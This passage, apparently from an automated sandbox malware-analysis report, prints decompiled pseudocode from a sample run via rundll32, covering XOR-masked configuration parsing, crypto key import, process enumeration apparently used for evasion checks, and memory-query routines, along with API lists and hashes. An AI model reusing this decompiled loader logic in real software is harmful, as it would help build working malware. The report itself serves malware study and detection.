				if(_t13 == 0) {
					_t21 = E044B6D63(_a8 + _a8);
					if(_t21 != 0) {
						E044B298F(_a4, _t21, _t23);
					}
					E044B6C2C(_a4);
				}
				return _t21;
			}

0x044b24bb
0x044b24c2
0x044b24c4
0x044b24d3
0x044b24da
0x044b24e9
0x044b24ed
0x044b24f4
0x044b24f4
0x044b24fc
0x044b2501
0x044b2506

APIs

lstrlen.KERNEL32(00000000,00000000,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B24C4

Part of subcall function 044B5FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044B24D8,00000001,044B58D7,00000000), ref: 044B5FF3
Part of subcall function 044B5FBB: memcpy.NTDLL(044B24D8,044B58D7,00000010,?,?,?,044B24D8,00000001,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740), ref: 044B600C
Part of subcall function 044B5FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 044B6035
Part of subcall function 044B5FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 044B604D
Part of subcall function 044B5FBB: memcpy.NTDLL(00000000,7477C740,04E695B0,00000010), ref: 044B609F

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: ab2df5b647b4df5e3cd265bd7860b3d1fb15595c1580771bcf26e35aaa538941
Instruction ID: 3df8a64e0187c944fe77a66c7dd79ab325fd99f750eed91e8fcb9834485c4274
Opcode Fuzzy Hash: ab2df5b647b4df5e3cd265bd7860b3d1fb15595c1580771bcf26e35aaa538941
Instruction Fuzzy Hash: 1DF03A76100109BBDF126E66DC04CEB7BADEF843A4B018027FE48CA115DA71EA559BF0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 044B1645 Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E044B1645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x44ba344; // 0x69b25f44
				if(E044B7780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x44ba378 = _v8;
				}
				_t33 =  *0x44ba344; // 0x69b25f44
				if(E044B7780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x44ba344; // 0x69b25f44
				_push(_t115);
				if(E044B7780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x44ba2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x44ba344; // 0x69b25f44
						_t45 = E044B5450(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x44ba2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x44ba344; // 0x69b25f44
						_t46 = E044B5450(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x44ba2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x44ba344; // 0x69b25f44
						_t47 = E044B5450(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x44ba2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x44ba344; // 0x69b25f44
						_t48 = E044B5450(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x44ba004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x44ba344; // 0x69b25f44
						_t49 = E044B5450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x44ba02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x44ba344; // 0x69b25f44
						_t50 = E044B5450(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x44ba2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x44ba344; // 0x69b25f44
								_t51 = E044B5450(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E044B2FBC(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E044B72C7();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x44ba344; // 0x69b25f44
								_t52 = E044B5450(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E044B2FBC(0, _t52) != 0) {
								_t121 =  *0x44ba3cc; // 0x4e695b0
								E044B765B(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x44ba344; // 0x69b25f44
								_t53 = E044B5450(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x44ba348; // 0x9ad5a8
								_t22 = _t54 + 0x44bb252; // 0x616d692f
								 *0x44ba374 = _t22;
								goto L60;
							} else {
								_t64 = E044B2FBC(0, _t53);
								 *0x44ba374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x44ba344; // 0x69b25f44
										_t56 = E044B5450(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x44ba348; // 0x9ad5a8
										_t23 = _t57 + 0x44bb79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E044B2FBC(0, _t56);
									}
									 *0x44ba3e0 = _t58;
									HeapFree( *0x44ba2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x044b1645
0x044b1645
0x044b1645
0x044b1645
0x044b1648
0x044b1665
0x044b1673
0x044b1673
0x044b1678
0x044b1692
0x044b1900
0x044b1907
0x044b190b
0x044b190b
0x044b1698
0x044b169d
0x044b16b5
0x044b18ed
0x044b18f7
0x00000000
0x044b16bb
0x044b16bb
0x044b16bc
0x044b16c1
0x044b16d7
0x044b16c3
0x044b16c3
0x044b16d0
0x044b16d0
0x044b16d9
0x044b16e2
0x044b16e4
0x044b16ee
0x044b16f3
0x044b16f3
0x044b16ee
0x044b16fa
0x044b1710
0x044b16fc
0x044b16fc
0x044b1709
0x044b1709
0x044b1714
0x044b1716
0x044b1720
0x044b1725
0x044b1725
0x044b1720
0x044b172c
0x044b1742
0x044b172e
0x044b172e
0x044b173b
0x044b173b
0x044b1746
0x044b1748
0x044b1752
0x044b1757
0x044b1757
0x044b1752
0x044b175e
0x044b1774
0x044b1760
0x044b1760
0x044b176d
0x044b176d
0x044b1778
0x044b177a
0x044b1784
0x044b1789
0x044b1789
0x044b1784
0x044b1790
0x044b17a6
0x044b1792
0x044b1792
0x044b179f
0x044b179f
0x044b17aa
0x044b17ac
0x044b17b6
0x044b17bb
0x044b17bb
0x044b17b6
0x044b17c2
0x044b17d8
0x044b17c4
0x044b17c4
0x044b17d1
0x044b17d1
0x044b17dc
0x044b17ef
0x044b17ef
0x00000000
0x044b17de
0x044b17de
0x044b17e8
0x00000000
0x044b17f9
0x044b17f9
0x044b17fb
0x044b1811
0x044b17fd
0x044b17fd
0x044b180a
0x044b180a
0x044b1815
0x044b1817
0x044b181a
0x044b181b
0x044b1822
0x044b1824
0x044b1825
0x044b1825
0x044b1822
0x044b182c
0x044b1842
0x044b182e
0x044b182e
0x044b183b
0x044b183b
0x044b1846
0x044b1854
0x044b185e
0x044b185e
0x044b1866
0x044b187c
0x044b1868
0x044b1868
0x044b1875
0x044b1875
0x044b1880
0x044b1893
0x044b1893
0x044b1898
0x044b189e
0x00000000
0x044b1882
0x044b1885
0x044b188a
0x044b1891
0x044b18a3
0x044b18a5
0x044b18bb
0x044b18a7
0x044b18a7
0x044b18b4
0x044b18b4
0x044b18bf
0x044b18cb
0x044b18d0
0x044b18d0
0x044b18c1
0x044b18c4
0x044b18c4
0x044b18de
0x044b18e3
0x044b18e9
0x00000000
0x044b18ec
0x00000000
0x044b1891
0x044b1880
0x044b17e8
0x044b17dc

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B16EA
StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B171C
StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B174E
StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B1780
StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B17B2
StrToIntExA.SHLWAPI(00000000,00000000,?,044BA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 044B17E4
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044B18E3
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 044B18F7

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: be01c45b42132e1d6cc2ad766e0f16fbcf99d8d90f357c7be8204fc4b288b68f
Instruction ID: 8149241481731283e1e930a61fe8271049faca54e79e4987627d5a56fde41940
Opcode Fuzzy Hash: be01c45b42132e1d6cc2ad766e0f16fbcf99d8d90f357c7be8204fc4b288b68f
Instruction Fuzzy Hash: 1681A174B00604ABEF11DBB9D998DDB77EDEB48684724092BA481E3201FA39FD4197F0

Uniqueness

Uniqueness Score: -1.00%

Function 00402495 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x404240 = 1;
										__eflags =  *0x404240;
										if( *0x404240 != 0) {
											goto L60;
										}
										_t84 =  *0x4041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x404240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x404240 = 1;
							__eflags =  *0x404240;
							if( *0x404240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x404240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0040249f
0x004024a2
0x004024a8
0x004024c6
0x00000000
0x004024c6
0x004024b0
0x004024b9
0x004024bf
0x004024ce
0x004024d1
0x004024d4
0x004024de
0x004024de
0x004024e0
0x004024e3
0x004024e5
0x004024e5
0x004024e7
0x004024ea
0x00000000
0x00000000
0x004024ec
0x004024ee
0x00402554
0x00402554
0x004026b2
0x00000000
0x004026b2
0x004024f0
0x004024f0
0x004024f4
0x004024f6
0x004024f6
0x004024f6
0x004024f6
0x004024f9
0x004024fa
0x004024fd
0x004024fd
0x00402501
0x00402505
0x00402513
0x00402513
0x0040251b
0x00402521
0x00402523
0x00402525
0x00402535
0x00402542
0x00402546
0x0040254b
0x0040254d
0x004025cb
0x004025cb
0x0040254f
0x0040254f
0x0040254f
0x004025cd
0x004025cf
0x004026b0
0x004026b0
0x00000000
0x004025d5
0x004025d5
0x004025dc
0x00000000
0x00000000
0x004025e2
0x004025e6
0x00402642
0x00402644
0x0040264c
0x0040264e
0x00402650
0x00000000
0x00000000
0x00402652
0x00402658
0x0040265a
0x0040265c
0x00402671
0x00402671
0x00402673
0x004026a2
0x004026a9
0x00000000
0x004026a9
0x00402677
0x00402678
0x0040267a
0x0040267c
0x0040267c
0x0040267e
0x00402680
0x00402682
0x00402696
0x00402696
0x00402699
0x0040269b
0x0040269b
0x0040269c
0x0040269c
0x00000000
0x00402684
0x00402684
0x00402684
0x0040268d
0x0040268e
0x00402690
0x00402692
0x00402692
0x00000000
0x00402684
0x00402682
0x0040265e
0x00402665
0x00402665
0x00402667
0x00000000
0x00000000
0x00402669
0x0040266a
0x0040266d
0x0040266f
0x00000000
0x00000000
0x00000000
0x0040266f
0x00000000
0x00402665
0x004025e8
0x004025eb
0x004025f0
0x00000000
0x00000000
0x004025f9
0x004025fb
0x00402601
0x00000000
0x00000000
0x00402607
0x0040260d
0x00000000
0x00000000
0x00402613
0x00402615
0x0040261e
0x00402622
0x00000000
0x00000000
0x00402628
0x0040262b
0x0040262d
0x00000000
0x00000000
0x00402634
0x00402636
0x00000000
0x00000000
0x00402638
0x0040263c
0x00000000
0x00000000
0x00000000
0x0040263c
0x00000000
0x00000000
0x00000000
0x00402527
0x00402527
0x00402527
0x0040252e
0x00000000
0x00000000
0x00402530
0x00402531
0x00402533
0x00000000
0x00000000
0x00000000
0x00402533
0x0040255b
0x0040255d
0x00000000
0x00000000
0x0040256d
0x0040256f
0x00402571
0x00000000
0x00000000
0x00402577
0x0040257e
0x004025aa
0x004025aa
0x004025ac
0x004025ae
0x004025c2
0x004025c4
0x00000000
0x00000000
0x00000000
0x00000000
0x004025b0
0x004025b0
0x004025b0
0x004025b9
0x004025ba
0x004025bc
0x004025be
0x004025be
0x00000000
0x004025b0
0x00402580
0x00402583
0x00402585
0x00402597
0x00402597
0x0040259a
0x0040259c
0x0040259c
0x0040259d
0x0040259d
0x004025a3
0x00000000
0x00000000
0x00000000
0x00000000
0x00402587
0x00402587
0x00402587
0x0040258e
0x00000000
0x00000000
0x00402590
0x00402590
0x00402591
0x00000000
0x00000000
0x00000000
0x00402591
0x00402593
0x00402595
0x004025a8
0x00000000
0x00000000
0x00000000
0x004025a8
0x00000000
0x00402595
0x00402507
0x0040250a
0x0040250d
0x00000000
0x00000000
0x0040250f
0x00402511
0x00000000
0x00000000
0x00000000
0x00402511
0x004024d6
0x004024d8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402546

Strings

@B@, xrefs: 004026A4
@B@, xrefs: 00402565
@B@, xrefs: 00402647

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: @B@$@B@$@B@
API String ID: 2850889275-824135644
Opcode ID: bd21073e85ec85f046d210bb25c1546b451c965cad7a507be6f0aac2e9cd7bb3
Instruction ID: 0871f6189e1179055b7c7ef70353ee771730a946b8c8c19e18a74fcf78237022
Opcode Fuzzy Hash: bd21073e85ec85f046d210bb25c1546b451c965cad7a507be6f0aac2e9cd7bb3
Instruction Fuzzy Hash: F7610730700502AFDB19CF28DBA862A33E5EB95354B24847BD915E73D0E7B9DC82C65C

Uniqueness

Uniqueness Score: -1.00%

Function 044B68BD Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E044B68BD() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x44ba348; // 0x9ad5a8
						_t2 = _t9 + 0x44bbeb0; // 0x73617661
						_push( &_v264);
						if( *0x44ba12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x044b68c8
0x044b68d2
0x044b68d6
0x044b68e0
0x044b6911
0x044b68e7
0x044b68ec
0x044b68f9
0x044b6902
0x044b6919
0x044b6904
0x044b690c
0x00000000
0x044b690c
0x044b691a
0x044b691b
0x00000000
0x044b691b
0x00000000
0x044b6915
0x044b6921
0x044b6926

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 044B68CD
Process32First.KERNEL32(00000000,?), ref: 044B68E0
Process32Next.KERNEL32(00000000,?), ref: 044B690C
CloseHandle.KERNEL32(00000000), ref: 044B691B

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: b2d3efd24bc632555a25f626ea46efe8c02a7ee38bc63d325dc44720017825a4
Instruction ID: 93878e2b7a4eded02af44ee5741734d7cbefd074b0a0a23f782b585ba6f54276
Opcode Fuzzy Hash: b2d3efd24bc632555a25f626ea46efe8c02a7ee38bc63d325dc44720017825a4
Instruction Fuzzy Hash: 2CF096722012146BEF20A6769C48EEB366CDBC5314F010067EA85D3101EA24FA568AF2

Uniqueness

Uniqueness Score: -1.00%

Function 004010C4 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010C4() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x4041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x4041ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4041a8 = _t5;
						 *0x4041b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4041a4 = _t6;
						if(_t6 == 0) {
							 *0x4041a4 =  *0x4041a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x004010c5
0x004010d3
0x004010d9
0x004010e0
0x00401137
0x00401137
0x004010e2
0x004010ea
0x004010f7
0x004010f7
0x00401133
0x00401135
0x00000000
0x00000000
0x00000000
0x004010ec
0x004010f3
0x004010f9
0x004010f9
0x004010fe
0x0040110c
0x00401111
0x00401117
0x0040111d
0x00401124
0x00401126
0x00401126
0x00401130
0x004010f5
0x004010f5
0x00000000
0x004010f5
0x004010f3

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401313), ref: 004010D3
GetVersion.KERNEL32 ref: 004010E2
GetCurrentProcessId.KERNEL32 ref: 004010FE
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401117

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
